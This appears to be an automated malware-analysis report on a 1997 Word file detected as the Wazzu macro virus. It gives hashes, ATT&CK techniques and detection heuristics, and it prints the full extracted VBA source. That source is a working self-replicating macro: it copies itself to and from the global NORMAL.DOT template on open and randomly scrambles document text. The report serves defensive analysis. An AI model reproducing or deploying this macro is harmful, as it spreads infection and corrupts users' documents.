Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7398736f5394f6c…

MALICIOUS

Office (OLE)

Size: 80.0 KB
Created: 1997-10-01 07:43:00
Authoring application: Microsoft Word 8.0
First seen: 2012-10-03
MD5: 839fe1e8097dd5c92171f1e47203f677
SHA-1: 2a99cac48c662af431f70a26c8f7020ef8216dd9
SHA-256: d7398736f5394f6c448800c7641c952634a03dcb312898c8f999b6b596a020e5
Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample exhibits characteristics of legacy WordBasic macro viruses, including the presence of an AutoOpen macro and specific markers. The VBA code appears to obfuscate its functionality by manipulating document content and potentially preparing to execute a payload, as indicated by the ClamAV detections 'Doc.Trojan.Wazzu-47' and 'Doc.Trojan.Wazzu-11'. The macro's primary purpose seems to be related to payload delivery or execution, aligning with a spearphishing attachment attack vector.

Heuristics 4

  • ClamAV: Doc.Trojan.Wazzu-47 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers (high; OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (medium; 1 related finding; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (low; OLE_VBA_AUTOOPEN)
    Matched line in script: Attribute VB_Name = "autoOpen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1921 bytes
SHA-256: ecfadf9cb00df27d2d2d1251e1b3013a786164040e854a0ca7ce76a197f29c77
Detection: ClamAV: Doc.Trojan.Wazzu-11
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
    On Error GoTo -1: On Error GoTo errCaught
        
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
    globMacro$ = "Global:autoOpen"
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If MacroFile$ = "NORMAL.DOT" Then
        WordBasic.MacroCopy globMacro$, fileMacro$
        WordBasic.FileSaveAs Format:=1
    Else
        WordBasic.MacroCopy fileMacro$, globMacro$
    End If

    Payload

GoTo bye
errCaught:

bye:
    On Error GoTo -1: On Error GoTo 0

End Sub

Private Sub Payload()
Dim i
Dim selWord$
    For i = 1 To 3
        If Rnd() < 0.2 Then
            RndWord
            WordBasic.SelectCurWord
            selWord$ = WordBasic.[Selection$]()
            WordBasic.DeleteWord

            RndWord
            WordBasic.Insert selWord$ + " "
        End If
    Next

    If Rnd() < 0.25 Then
        RndWord
        WordBasic.Insert "wazzu "
        WordBasic.StartOfDocument
    End If

End Sub

Private Sub RndWord()
Dim wordNum
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
    WordBasic.CurValues.DocumentStatistics dlg

    wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words))
    WordBasic.StartOfDocument
    WordBasic.WordRight wordNum
End Sub